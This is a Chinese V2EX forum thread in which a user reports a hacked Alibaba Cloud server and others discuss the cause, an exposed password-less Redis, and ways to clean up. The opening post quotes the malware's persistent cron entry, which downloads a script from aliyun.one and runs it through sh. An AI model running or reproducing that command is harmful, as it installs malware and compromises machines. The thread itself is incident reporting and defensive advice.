我擦 阿里云服务器被黑了 aliyun.one

2019-12-05 15:37:44 +08:00
 liusong2770

多了一条删不掉的定时任务 */15 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;exec(urllib.urlopen("http://aliyun.one/pygo").read())')|sh

11048 次点击
所在节点    程序员
36 条回复
ghostwwg
2019-12-06 09:26:38 +08:00
是不是中间件非 VPC 网络且用了阿里的内网 SLB ?
cedoo22
2019-12-06 09:27:09 +08:00
中间件不加密, 阿里云也救不了你
CivAx
2019-12-06 09:46:33 +08:00
这域名还对应了全球各地不同地区的服务器…还组了高可用
54skyer
2019-12-06 10:00:39 +08:00
我昨天设置 redis 远程可访问 没有设置密码 一台腾讯云 一台阿里云 腾讯云被黑了 来这里一看有人跟我一样 赶紧把阿里云的 redis 禁止远程访问了 主要原因是没有设置密码 直接输入 ip 和 redis 默认端口就可以访问 看到的小伙伴切勿这么操作了 或者加上密码 去解决问题去了 现在他在我的 crontab 里写入了一条定时任务 只要我删除或者更改 他都会重新写入覆盖
aut0man
2019-12-06 10:04:48 +08:00
pm:我为什么要加入 v 站?都是英文和汉字,为什么组合在一起就看不懂了???
Tink
2019-12-06 10:23:46 +08:00
@durban126 #17 跟什么云没关系,自己傻逼
54skyer
2019-12-06 10:24:30 +08:00
各种基础命令已被更改 netstat -ntlp 查看到多了一个端口为 61161 的进程 但是这个命名 netstat 被改成显示的进程端口记录不显示 pid 了 sudo lsof -i:61131 也是 目前还没什么好办法 有大佬支招吗 那个删除 /tmp/sshd 文件 创建 /tmp/sshd 目录的临时方法可以奏效 起码让木马写不进去东西 内存不会被占用过多导致服务器卡顿
wwwzhujibcom
2019-12-06 12:20:29 +08:00
阿里的 IP 太容易被扫了 我还是用百度的吧 而且快照还是免费的
la2la
2019-12-06 12:29:44 +08:00
没有技术大牛支持的话,可以导出数据,重装系统。不然修改了什么文件,甚至篡改基础命令,太难查出来
dremy
2019-12-06 12:44:03 +08:00
9102 年末了竟然还有人把 redis 不设密暴露在外网,是嫌自己运气太好了吗
belin520
2019-12-06 12:44:32 +08:00
可能是某个 V 友 养的病毒
loissiau
2019-12-06 12:59:11 +08:00
用 root 用户也看不到进程 pid ?不太可能
loissiau
2019-12-06 13:05:18 +08:00
看下有没有多出用户,启动项和 cron 定时任务,设置防火墙,把出入口流量拦截掉,只留 ssh 的特定端口供访问,最后重启了事,病毒清理完了再放开对外网络。
killerzhangsan
2019-12-06 13:18:58 +08:00
@loissiau 命令被污染了,root 也看不到。
scukmh
2019-12-06 13:41:37 +08:00
@loissiau 人家把你的 ps 等命令给你替换了,你找找看呀。
没有靠谱运维的解决办法,重装系统。
steptodream
2019-12-06 13:44:41 +08:00
@dremy 看到 N 多因为 redis 被黑的 很多刚学习 redis 根本没注意这种安全问题 redis 默认无密监听所有 ip 我觉得 redis 应该改成默认只监听 localhost

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/626230

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX